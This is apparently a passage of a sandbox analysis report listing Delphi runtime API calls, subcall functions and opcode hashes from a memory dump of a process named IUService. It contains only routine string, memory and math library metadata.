                                                                                                                                            • VirtualQuery.KERNEL32(00000000,?,0000001C), ref: 50003A25
                                                                                                                                            Strings
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$qqrpvibFillQuerySystem@@Virtual
                                                                                                                                            • String ID: <JP$jP
                                                                                                                                            • API String ID: 2244405464-1976356052
                                                                                                                                            APIs
                                                                                                                                            • @System@@_llumod$qqrv.RTL120(0000000A,00000000), ref: 5000B978
                                                                                                                                            • @System@@_lludiv$qqrv.RTL120(0000000A,00000000), ref: 5000B993
                                                                                                                                            • @System@@SetLength$qqrp28System@%SmallString$iuc$255%uc.RTL120 ref: 5000B9F2
                                                                                                                                            Strings
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Length$qqrp28SmallString$iuc$255%ucSystem@%System@@System@@_lludiv$qqrvSystem@@_llumod$qqrv
                                                                                                                                            • String ID: -
                                                                                                                                            • API String ID: 1433924716-2547889144
                                                                                                                                            APIs
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500110D5
                                                                                                                                            • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 500110E7
                                                                                                                                              • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                                                              • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                                                              • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                                                              • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                                                            • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120 ref: 50011120
                                                                                                                                            Strings
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$CategoryCheckFindInitialize$qqrvLatin1$qqrbLoadLockSeparator$qqr26Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 305751366-3916222277
                                                                                                                                            APIs
                                                                                                                                            • @System@@GetMem$qqri.RTL120(?), ref: 5000C1A5
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120(?), ref: 5000C1D5
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?), ref: 5000C1F5
                                                                                                                                            • @System@DynArrayClear$qqrrpvpv.RTL120 ref: 5000C200
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@$ArrayChar$qqrpvibClear$qqrrpvpvFillMem$qqriMove$qqrpxvpvi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3421884137-0
                                                                                                                                            • Opcode ID: d72ef6b357c912858527ba27ee4b5402b2d8ef4a25db6a3fc010ba388ca52663
                                                                                                                                            • Instruction ID: 5db1012356cac20667bbd3f12f650a3e6fe453fe90b972ea62dd2f95c9d85502
                                                                                                                                            • Opcode Fuzzy Hash: d72ef6b357c912858527ba27ee4b5402b2d8ef4a25db6a3fc010ba388ca52663
                                                                                                                                            • Instruction Fuzzy Hash: 3B312D71E002599FDB14DF98CCA0ADEF7F1FF49220B518266E819EB352D7709E018B90
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 50024D00: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50025040), ref: 50024D80
                                                                                                                                              • Part of subcall function 50024D00: @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50025040), ref: 50024D8B
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50025B12), ref: 50025A96
                                                                                                                                            • @Sysutils@TryStrToTime$qqrx20System@UnicodeStringr16System@TDateTimerx24Sysutils@TFormatSettings.RTL120(?,00000000,50025B12), ref: 50025ACA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$Sysutils@$StringSystem@@$AnsiCopy$qqrx20DateFormatFromInternalSettingsStr$qqrr20StringiiStringr16Stringx27System@%T$us$i0$%Time$qqrx20Timerx24Trim$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2292931001-0
                                                                                                                                            • Opcode ID: 84447efb2cb3415f8d16ecc4577d258c5cf45c66936d73402ad984f0ee6a8cab
                                                                                                                                            • Instruction ID: d33868aacac2f56ee1de542acf73dd20ca58ab904041af6ac397144845128ccd
                                                                                                                                            • Opcode Fuzzy Hash: 84447efb2cb3415f8d16ecc4577d258c5cf45c66936d73402ad984f0ee6a8cab
                                                                                                                                            • Instruction Fuzzy Hash: 0C315E3090654EEFCF00DFA4E9928DDB7F6EF59301F6046A6E800A7250DB719E05DB99
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500248EC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024C6D), ref: 50024968
                                                                                                                                              • Part of subcall function 500248EC: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024C6D), ref: 5002498C
                                                                                                                                              • Part of subcall function 500248EC: @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50024C6D), ref: 50024997
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50025A1C), ref: 500259AA
                                                                                                                                            • @Sysutils@TryStrToTime$qqrx20System@UnicodeStringr16System@TDateTime.RTL120(00000000,50025A1C), ref: 500259DA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Copy$qqrx20DateStringiiStringr16TimeTime$qqrx20Trim$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2689908369-0
                                                                                                                                            • Opcode ID: b0c36b5748d489f7461d89ea8bf913bcfd18d707684df885256712fd9f4fa0f3
                                                                                                                                            • Instruction ID: 93a382b7fa73da40bbc338623e28f744c92bd425220c80b90625fb34c49939c0
                                                                                                                                            • Opcode Fuzzy Hash: b0c36b5748d489f7461d89ea8bf913bcfd18d707684df885256712fd9f4fa0f3
                                                                                                                                            • Instruction Fuzzy Hash: E521D13091218ADBDF00DFA4E8829EDB7F6EF48311F6006A2D440E3200EB309E40DB89
                                                                                                                                            APIs
                                                                                                                                            • @System@@NewWideString$qqri.RTL120 ref: 50009B82
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 50009B99
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 50009BA9
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 50009BC7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Move$qqrpxvpviSystem@$String$qqriSystem@@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2978300780-0
                                                                                                                                            • Opcode ID: 9ed6245364869eda90bbe2cf8a72df44c5e7e2fe0a89643c11834f0be839a104
                                                                                                                                            • Instruction ID: 2cc34c0e70a3c0a200f551ea926f3f83d6c741b9e70e651da199dcfddd72ecd4
                                                                                                                                            • Opcode Fuzzy Hash: 9ed6245364869eda90bbe2cf8a72df44c5e7e2fe0a89643c11834f0be839a104
                                                                                                                                            • Instruction Fuzzy Hash: D3219D757046458FEB14DE6CE9E089EB3E5EB94220B844B3DE946C7361EA31EC048781
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                                                              • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,500244C4), ref: 5002446D
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,500244C4), ref: 50024472
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$StringSystem@System@@$EnsureString$qqrr20$Len$qqrx20$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3424071357-0
                                                                                                                                            • Opcode ID: 163a8ac3203b88bc679271fd277f8823215291bac1fd57a86e87f28860fdda50
                                                                                                                                            • Instruction ID: f3f28708e52072fea52f12d8c3f656ea0e7ad7d042a07a009517b6842a75c669
                                                                                                                                            • Opcode Fuzzy Hash: 163a8ac3203b88bc679271fd277f8823215291bac1fd57a86e87f28860fdda50
                                                                                                                                            • Instruction Fuzzy Hash: 90210531901185DFCB51EFA8D891ADDB7F4EF6A310F6042A2E844D3351E7309E10C791
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                                                              • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500246CE), ref: 5002467C
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500246CE), ref: 500246A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$StringSystem@System@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$EnsureInternalString$qqrr20$Len$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3299320216-0
                                                                                                                                            • Opcode ID: 063df37b82a887ee646a343d3283fa2db6b459733aeeaa70d7aed97fde92dc1c
                                                                                                                                            • Instruction ID: f889b8404583497afe00f4d2b022e65e4a04262e97f4224d3da720eb7ba1a7cf
                                                                                                                                            • Opcode Fuzzy Hash: 063df37b82a887ee646a343d3283fa2db6b459733aeeaa70d7aed97fde92dc1c
                                                                                                                                            • Instruction Fuzzy Hash: 8D11C630B0218ADFDB51DFA8E94589EB3F9EF963007A14276E940D3215E730EE01D791
                                                                                                                                            APIs
                                                                                                                                            • @Math@IsZero$qqrxgg.RTL120(00000000,00000000,00000000,?,?,?), ref: 5001333F
                                                                                                                                            • @Math@SameValue$qqrxgxgg.RTL120(00000000,00000000,00000000,00000000,80000000,00003FFF,?,?,?,00000000,00000000,00000000,?,?,?), ref: 50013379
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Math@$SameValue$qqrxgxggZero$qqrxgg
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2598474148-0
                                                                                                                                            • Opcode ID: c5316efb0892469dfe6559604264221be66581b1a931cb23f285ec7ffa091242
                                                                                                                                            • Instruction ID: 8b6f4d4d102a9fe6760369e0e7593088a52b22f4b9c98d94c50d589b633ebce5
                                                                                                                                            • Opcode Fuzzy Hash: c5316efb0892469dfe6559604264221be66581b1a931cb23f285ec7ffa091242
                                                                                                                                            • Instruction Fuzzy Hash: 28110D70E48245B6EF315FA08C027AE7FA0AF01A10F208B4BFEF4A51D1DA724260C789
                                                                                                                                            APIs
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$StringSystem@System@@$AnsiEnsureFromInternalLen$qqrx20Str$qqrr20String$qqrr20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2906622797-0
                                                                                                                                            • Opcode ID: 9cab3a8bcc449554f3d38e26dfc2d9bd4fcf12d5c115a2b1dcda5b5b04b7de7d
                                                                                                                                            • Instruction ID: a635cd3dcb40994497b53f8fe6e6c41f0fe1daa708a8bd6d2e43c945e9681864
                                                                                                                                            • Opcode Fuzzy Hash: 9cab3a8bcc449554f3d38e26dfc2d9bd4fcf12d5c115a2b1dcda5b5b04b7de7d
                                                                                                                                            • Instruction Fuzzy Hash: AF01B13551F1D6AED7A1AFA0F8525EEB7E8EB13300BA106B6ED2082901D3649E00A251
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5000D75A
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5000D766
                                                                                                                                              • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                                                              • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5000D7C6
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5000D7D4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@Wide$ArrayLength$qqrr17Length$qqrvStringi$Move$qqrpxvpviString$qqri
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2943924986-0
                                                                                                                                            • Opcode ID: 085050b287510eb7b9789a4d6570b4c0541888048f5ea3701a0f565ec4d1815e
                                                                                                                                            • Instruction ID: 5542b4fa33d5804e65baac3af09d9e428f9e0197dd64d1a1656dc7895a855856
                                                                                                                                            • Opcode Fuzzy Hash: 085050b287510eb7b9789a4d6570b4c0541888048f5ea3701a0f565ec4d1815e
                                                                                                                                            • Instruction Fuzzy Hash: 4E01F9202149495FD3109F6DD8419ABB3E2EFE0311B40C23BF545C7229EAB49942C290
                                                                                                                                            APIs
                                                                                                                                            • @System@@NewWideString$qqri.RTL120 ref: 5000992F
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5000993E
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5000994E
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120 ref: 50009962
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Move$qqrpxvpviSystem@System@@$Clr$qqrpvFreeStringString$qqriWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2700047326-0
                                                                                                                                            • Opcode ID: 2a90c5cc7be5839c9d2fdc1aa24c1342b383aaa77810758ece04b21b21fc663a
                                                                                                                                            • Instruction ID: 98f1936eb00471f73aa790e79a7215fb5c6e676163bb9629522c800d1bc1a43f
                                                                                                                                            • Opcode Fuzzy Hash: 2a90c5cc7be5839c9d2fdc1aa24c1342b383aaa77810758ece04b21b21fc663a
                                                                                                                                            • Instruction Fuzzy Hash: 1501F7313096454BAB14DA6DECA09AEB3D8DF90610B80033DFA84C7351EE20ED05C384
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5001C2D3
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5001C348), ref: 5001C300
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @Sysutils@ByteType$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,5001C348), ref: 5001C31C
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5001C34F), ref: 5001C342
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$ByteClr$qqrpvInternalRef$qqrpvSysutils@T$us$i0$%iType$qqrx27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3795063905-0
                                                                                                                                            • Opcode ID: 0090cee197739f04d46da03a3fbf7122e71953c6443ae2ffadc7c537a123e11b
                                                                                                                                            • Instruction ID: edce9a773ba6554bf0e1fbf5d896e20fbc1511fab1bfff3c5ce3298a0291d8fe
                                                                                                                                            • Opcode Fuzzy Hash: 0090cee197739f04d46da03a3fbf7122e71953c6443ae2ffadc7c537a123e11b
                                                                                                                                            • Instruction Fuzzy Hash: 47014C30704289EF9B11DEA9DE92C6EB3F8FB482107A18275E504D3251EB70EF80D655
                                                                                                                                            APIs
                                                                                                                                            • @System@UniqueString$qqrr20System@UnicodeString.RTL120 ref: 5000A53F
                                                                                                                                              • Part of subcall function 5000AAF8: @System@@NewUnicodeString$qqri.RTL120(?,5000A544), ref: 5000AAC6
                                                                                                                                              • Part of subcall function 5000AAF8: @System@Move$qqrpxvpvi.RTL120(00000000,?,5000A544), ref: 5000AAD7
                                                                                                                                              • Part of subcall function 5000AAF8: @System@@FreeMem$qqrpv.RTL120(?,5000A544), ref: 5000AAEC
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A559
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5000A593
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A59D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$String$AnsiFromMove$qqrpxvpviStr$qqrr20Stringx27System@%T$us$i0$%$FreeInternalLength$qqrr20Mem$qqrpvString$qqriString$qqrr20StringiUnique
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2646382837-0
                                                                                                                                            • Opcode ID: c65559b3a43a539bc9f39b9396eb3fc635474360def7c2b98761288a201bb686
                                                                                                                                            • Instruction ID: 572ec78243513e6f1005ed345ec0839db98a53653f4091473b1bd5e8e29c749c
                                                                                                                                            • Opcode Fuzzy Hash: c65559b3a43a539bc9f39b9396eb3fc635474360def7c2b98761288a201bb686
                                                                                                                                            • Instruction Fuzzy Hash: E001DF317029624BAB109A3DDDA1559B3A6BFD6215394433AA506CB21EDA71CC0582C1
                                                                                                                                            APIs
                                                                                                                                            • @System@Random$qqrv.RTL120 ref: 500141DA
                                                                                                                                            • @System@Random$qqrv.RTL120 ref: 500141EF
                                                                                                                                            • @System@Ln$qqrxg.RTL120(?,?,?), ref: 5001422E
                                                                                                                                            • @System@Sqrt$qqrxg.RTL120 ref: 50014245
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Random$qqrv$Ln$qqrxgSqrt$qqrxg
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 817724637-0
                                                                                                                                            • Opcode ID: a6d630325e0aea591bba7b45fbec38567b7a778495fcfedd49ce34c84d5982ca
                                                                                                                                            • Instruction ID: fbb615ccd8c33ff108ba09c26bee9e4f63df910d59be1be1ea666f5daae47871
                                                                                                                                            • Opcode Fuzzy Hash: a6d630325e0aea591bba7b45fbec38567b7a778495fcfedd49ce34c84d5982ca
                                                                                                                                            • Instruction Fuzzy Hash: 9D11A3A1E0E0A962DB5227B1FC254CD7F74EE52901B968B4BE8E160172E92344B0CB91
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122D7
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122E6
